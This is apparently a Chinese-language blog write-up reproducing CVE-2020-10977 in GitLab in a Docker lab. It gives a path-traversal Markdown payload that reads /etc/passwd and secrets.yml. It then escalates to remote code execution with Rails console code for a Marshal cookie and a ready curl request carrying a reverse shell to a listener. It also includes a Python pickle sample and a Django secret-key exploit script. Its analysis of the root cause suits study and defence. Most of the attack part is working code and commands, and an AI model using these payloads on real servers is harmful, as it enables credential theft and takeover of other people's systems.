简介

GitLab CE/EE 版本 >=8.5，<=12.9

建立环境

网上较多的版本是 使用 Centos 重新建立的 这里用比加快的 Docker 镜像的方法 部署一个环境。Official Doc

参考文章 ：

• https://juejin.cn/post/6916343939649765389
• https://atsud0.me/2021/03/09/CVE-2020-10977%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/

步骤如下

1. docker pull 拉取镜像

   sudo docker pull gitlab/gitlab-ce:12.8.0-ce.0

2. 重新命名 TAG 方便使用 （这步骤可以省略）

   sudo docker tag a505a4b614a7 cve-2020-10977

3. 导入 基本的环境变量 sethome 这个位置是 docker 容器的位置

   export GITLAB_HOME=/srv/gitlab

4. 启动 docker 镜像

   docker run --detach \

   --hostname gitlab.example.com \
   --publish 443:443 --publish 80:80 --publish 22:22 \
   --name gitlab \
   --restart always \
   --volume $GITLAB_HOME/config:/etc/gitlab \
   --volume $GITLAB_HOME/logs:/var/log/gitlab \
   --volume $GITLAB_HOME/data:/var/opt/gitlab \
   cve-2020-10977 
   # 这里挂载了 几个镜像的盘 一个是 config 一个是log 一个是 数据 这里三个位置可以小小的记录一下。

5. 进入内部环境

   sudo docker exec -u root -it {docker 容器 cve-2020-10977 的 id 比如我这里是:f26f64d8c1fb} /bin/bash 

6. 进去 shell 之后 看看 RELEASE 信息

   root@gitlab:/# cat /RELEASE
   RELEASE_PACKAGE=gitlab-ce
   RELEASE_VERSION=12.8.0-ce.0
   DOWNLOAD_URL=https://downloads-packages.s3.amazonaws.com/ubuntu-xenial/gitlab-ce_12.8.0-ce.0_amd64.deb

7. 基础的一些 用户信息 特别是 git user

   root@gitlab:/# cat /etc/passwd |grep git
   git:x:998:998::/var/opt/gitlab:/bin/sh
   gitlab-www:x:999:999::/var/opt/gitlab/nginx:/bin/false
   gitlab-redis:x:997:997::/var/opt/gitlab/redis:/bin/false
   gitlab-psql:x:996:996::/var/opt/gitlab/postgresql:/bin/sh
   mattermost:x:994:994::/var/opt/gitlab/mattermost:/bin/sh
   registry:x:993:993::/var/opt/gitlab/registry:/bin/sh
   gitlab-prometheus:x:992:992::/var/opt/gitlab/prometheus:/bin/sh
   gitlab-consul:x:991:991::/var/opt/gitlab/consul:/bin/sh

8. 现在看看 我们docker去哪里了。离开 容器内部 看一下 arp 信息 一般性都能找到

   $ arp -a |grep docker
   ? (172.17.0.2) at 02:42:ac:11:00:02 [ether] on docker0

到此为止 这个镜像的基础环境算是已经搞定了

基本信息

使用 chrome 等 浏览器进入 对应的界面

先前版本的 gitlab 默认帐号密码

{
	"user":"root", 
	"pass":"5iveL!fe"
}

当你 访问

先是会跳转到 密码 修改界面 变更你的密码。变更完毕之后 你的登录方式是 root：你的变更的密码

漏洞复现

LFI 过程

1. 创建两个 仓库 例如 test 和 try

2. 在其中一个 仓库 例如 test 提一个 issue

3. issue 的 描述部分 Write 使用 Markdown 格式的 payload 这里存在 LFI (Local File Inclusion) 漏洞

   ![a](/uploads/1111111111111111111111111111111111111111111/../../../../../../../../../../../../etc/passwd)

4. 保存 issue 这时候还看不到 具体的信息

5. 将这个 issue 进行转移 即 move issue 转移到 第二个仓库 try 中

6. 访问 try 仓库的 issue 就会发现 这个 issue 的描述 存在一个链接 { 即文件passwd }

7. 访问这个链接 便可以下载到 具体的 passwd 文件

做安全的都会有一种敏感性我觉得。

就目前已知 payload 的情况我们可以略微的猜测一下：

• 在转移 issue 的时候 gitlab 没有设置路径的检查或弱检查 同时盲目的引入了内容
• passwd 文本疑似被 git 的转存机制给暂时所转存 使得路径的检查失败 当转存发生在 Move issue的路径检查之前时很有可能就会发生这种问题

具体可能需要定位源码再来解释。从性质上来说 前者是程序员的安全意识疏忽 后者是处理上的逻辑漏洞。我更为偏向后我更为偏向后者。（毕竟是一个大范围版本通杀）

RCE 过程

8. 这里需要横多的信息 有如下几个

• 我们现在所在的用户组在 git:git
• 我们可以检查一下当前 作为 git 用户可以 读取的敏感配置文件 可以用指令

find / -type f -perm -u+r 2>/dev/null|grep {你想要寻找的带路径文件名称 正则表达式}

1. /var/opt/gitlab/gitlab-rails/etc/database.yml 数据库信息 包含用户名 可能含有密码
2. /var/opt/gitlab/gitlab-rails/etc/secrets.yml !!! 这是最为重要的密钥保存点 保存了 几乎整个 rails 最重要的 secrets base
3. /opt/gitlab/embedded/service/gitlab-rails/config/secrets.yml 同上
4. /var/opt/gitlab/gitlab-rails/etc/gitlab.yml app 核心
5. /var/opt/gitlab/gitlab-rails/etc/resque.yml
6. /var/opt/gitlab/gitlab-shell/config.yml
7. /var/opt/gitlab/gitlab-rails/etc/gitlab_pages_secret
8. /var/opt/gitlab/gitlab-rails/etc/gitlab_shell_secret
9. /var/opt/gitlab/gitlab-rails/etc/gitlab_workhorse_secret

9. 盗取到对应的 gitlab key base 位置在 绝对路径 /var/opt/gitlab/gitlab-rails/etc/secrets.yml

![a](/uploads/11111111111111111111111111111111/../../../../../../../../../../../../../../opt/gitlab/embedded/service/gitlab-rails/config/secrets.yml)
![a](/uploads/11111111111111111111111111111111/../../../../../../../../../../../../../../var/opt/gitlab/gitlab-rails/etc/secrets.yml)

通过上述的 LFI 操作将文件下载下来两个文件 理应是一致的

10. 可以获得如下的 key base 其中最为重要的是 secret_key_base 字段

• db_key_base: 1bdc9b1cbb50c7a2415dcafeb5499e95f16b90e75eb7d0ca7ae84ed5816f4cc92300976a2bdb2a4962137d2356e1005a14ab717cc00a952365828fb4ca1d2ad6
• secret_key_base: 6667c4c85f80291990f74f6af8262ee43e4db96c19f0b4a0ba9d19e9c33792fff67f1db370c546ecb3c364c4b38ddf2084fb7a03d822b15828a1b0285a801d20
• otp_key_base: e8c41b7aa30ba3eb32fc478705c4c22f83f1665051389fbe7d4e942f65af4804d1a3e09d2bd38d7249ed19c53f48ee42552240931091d3e4bf9a0b648130594d

11. 在 本地 建立 一个 gitlab 环境 对应进行如下的 反序列化 RCE payload 生成

    gitlab-rails console # 进入rails console
    # in console 
    request = ActionDispatch::Request.new(Rails.application.env_config)
    request.env["action_dispatch.cookies_serializer"] = :marshal
    cookies = request.cookie_jar
    erb = ERB.new("<%= `{Command you wnat execute}` %>")
    depr = ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.new(erb, :result, "@result", ActiveSupport::Deprecation.new)
    cookies.signed[:cookie] = depr
    puts cookies[:cookie]

12. 构造最终请求

    curl -vvv 'http://192.168.1.86:8888/users/sign_in' -b "experimentation_subject_id=cookie"

例如我这里的 payload

# irb 中生成 的 payload 为`bash -c 'bash -i >& /dev/tcp/172.17.0.1/7777 0>&1'`  # 是 docker 环境的标准实现

curl http://172.17.0.2/users/sign_in -b 'experimentation_subject_id=BAhvOkBBY3RpdmVTdXBwb3J0OjpEZXByZWNhdGlvbjo6RGVwcmVjYXRlZEluc3RhbmNlVmFyaWFibGVQcm94eQk6DkBpbnN0YW5jZW86CEVSQgs6EEBzYWZlX2xldmVsMDoJQHNyY0kidCNjb2Rpbmc6VVRGLTgKX2VyYm91dCA9ICsnJzsgX2VyYm91dC48PCgoIGBiYXNoIC1jICdiYXNoIC1pID4mIC9kZXYvdGNwLzE3Mi4xNy4wLjEvNzc3NyAwPiYxJ2AgKS50b19zKTsgX2VyYm91dAY6BkVGOg5AZW5jb2RpbmdJdToNRW5jb2RpbmcKVVRGLTgGOwpGOhNAZnJvemVuX3N0cmluZzA6DkBmaWxlbmFtZTA6DEBsaW5lbm9pADoMQG1ldGhvZDoLcmVzdWx0OglAdmFySSIMQHJlc3VsdAY7ClQ6EEBkZXByZWNhdG9ySXU6H0FjdGl2ZVN1cHBvcnQ6OkRlcHJlY2F0aW9uAAY7ClQ=--6401a7540000bc231432e6a3c2eaf61ca843192c' -vvv

13. 当 你在 7777 端口进行监听的时候 便可以获得 梦寐以求的 shell 返回 如下

$ nc -lvvp 7777 
listening on [any] 7777 ...
connect to [172.17.0.1] from gitlab.example.com [172.17.0.2] 59420
bash: cannot set terminal process group (743): Inappropriate ioctl for device
bash: no job control in this shell
git@gitlab:~/gitlab-rails/working$ ls
ls
git@gitlab:~/gitlab-rails/working$ whoami
whoami
git
git@gitlab:~/gitlab-rails/working$ exit
exit
exit

内容扩展

在 从 LFI 进阶到命令执行的时候 可能会让很多新人迷惑 如果 不能完好解释出来这一点的话

这里使用了 Session 反序列化技巧 构造出一个 恶意的 cookie 名字为 experimentation_subject_id 值为对应的 那一长串对象的构造

然后请求一个必然 存在反序列化过程的 API （例如上面 /users/sign_in 登录接口）

应为此处 Cookie 对应的是 用户会话类型的对象 那么 最常使用的便是 登录 登出 接口

同样具有类似操作的还有 Python 的 Django 框架

当 Python 的 Django Secret key 泄露的时候 如发炮制 同样也可以造成 RCE

参考文章 http://www.code2sec.com/djangode-secret-keyxie-lou-dao-zhi-de-ming-ling-zhi-xing-shi-jian.html

当 Django 中 Secret Key 用作于 session 加密 并且 cookie-based session 的时候 session data 是存在于 用户处的

一旦任何数据存在于用户处都可造成 伪造的风险

当服务器需要从拿出 Session 会话的数据进行操作的时候 就会对 Cookie 进行反序列化操作

而 python 有一个知名的 反序列化库 具有这种问题 pickle

import pickle
import os

class Rce(object): 
    def __reduce__(self):
        return (os.system,('ifconfig',))

a = Rce()
b = pickle.dumps(a)
print(b)
# pickle.loads(b)  # loads 进行反序列化 在 运行结束的时候 会调用 对象的 __reduce__ 方法 于是便会 执行 命令 ifconfig 

如此 bit4 给出了 对应的 Django POC

# !/usr/bin/env python
# -*- coding:utf-8 -*-
__author__ = 'bit4'
__github__ = 'https://github.com/bit4woo'

import os
import requests
from django.contrib.sessions.serializers import PickleSerializer
from django.core import signing
import pickle

def session_gen(SECRET_KEY,command = 'ping -n 3 test.0y0.link || ping -c test.0y0.link',):
    class Run(object):
        def __reduce__(self):
            #return (os.system,('ping test.0y0.link',))
            return (os.system,(command,))

    #SECRET_KEY = '1bb8)i&dl9c5=npkp248gl&aji7^x6izh3!itsmb6&yl!fak&f'
    SECRET_KEY = SECRET_KEY

    sess = signing.dumps(Run(), key = SECRET_KEY,serializer=PickleSerializer,salt='django.contrib.sessions.backends.signed_cookies')
    #生成的恶意session
    print sess


    '''
    salt='django.contrib.sessions.backends.signed_cookies'
    sess = pickle.dumps(Run())
    sess = signing.b64_encode(sess)#通过跟踪signing.dumps函数可以知道pickle.dumps后的数据还经过了如下处理。
    sess = signing.TimestampSigner(key=SECRET_KEY, salt=salt).sign(sess)
    print sess
    #这里生成的session也是可以成功利用的，这样写只是为了理解signing.dumps。
    '''

    session = 'sessionid={0}'.format(sess)
    return session

def exp(url,SECRET_KEY,command):

    headers = {'Cookie':session_gen(SECRET_KEY,command)}
    proxy = {"http":"http://127.0.0.1:8080"}#设置为burp的代理方便观察请求包
    response = requests.get(url,headers= headers,proxies = proxy)
    #print response.content

if __name__ == '__main__':
    url = 'http://127.0.0.1:8000/'
    SECRET_KEY = '1bb8)i&dl9c5=npkp248gl&aji7^x6izh3!itsmb6&yl!fak&f'
    command = 'ping -n 3 test.0y0.link || ping -c test.0y0.link'
    exp(url,SECRET_KEY,command)

当然 这个脚本可以进行一波 武器化

后续研究

我查找了具体当时 HackerOne 的漏洞说明

https://hackerone.com/reports/827052

可以说基本验证了我的两个猜想。一个是对转存文件的弱检查

MARKDOWN_PATTERN = %r{\!?\[.*?\]\(/uploads/(?<secret>[0-9a-f]{32})/(?<file>.*?)\)}.freeze

这是使用的 Markdown 对 32位的 全数字小写字母的匹配 并且解析出 secret 和 file 值

在下面的 Ruby 代码中

   @text.gsub(@pattern) do |markdown|
          file = find_file(@source_project, $~[:secret], $~[:file])
          break markdown unless file.try(:exists?)

          klass = target_parent.is_a?(Namespace) ? NamespaceFileUploader : FileUploader
          moved = klass.copy_to(file, target_parent)
...
   def find_file(project, secret, file)
        uploader = FileUploader.new(project, secret: secret)
        uploader.retrieve_from_store!(file)
        uploader
      end

find_file 函数也并未对 file 的值存在任何效验

当不存在时 尝试根据提供的地址拷贝该文件 这里应该也并未有文件的效验。

作者还提供了 升级为 RCE 的扩大利用方法。

其原理正是之前我有提到的 Cookies 存储方式是字符串存储的不安全对象

https://gitlab.com/gitlab-org/gitlab-foss/-/blob/master/lib/gitlab/experimentation.rb#:~:text=121-,122,-123

这一个文件说明了 experimentation cookie 的处理方式。

Think

我觉得身为安全人员需要有一种警惕性和敏感性。 漏洞挖掘其实并不能只是浮于表面。这里的表面具有两种含义。

• 一是不能止步于此。 尽管你发现的是 一个小小的应用程式 XSS 但是万一后面是 能运行处理 javascript 的 electron 应用呢？ 或者你仅仅是发现了文件包含的点，或是尝试 引用出重要的配置文件（各种 secret base ，默认位置数据库备份）

• 二是不能止步于操作和利用。 很多情况下 我们需要回归源码 寻找程序员当时编写程序的具体疏漏之处。从源码的角度解释出具体的漏洞产生原因。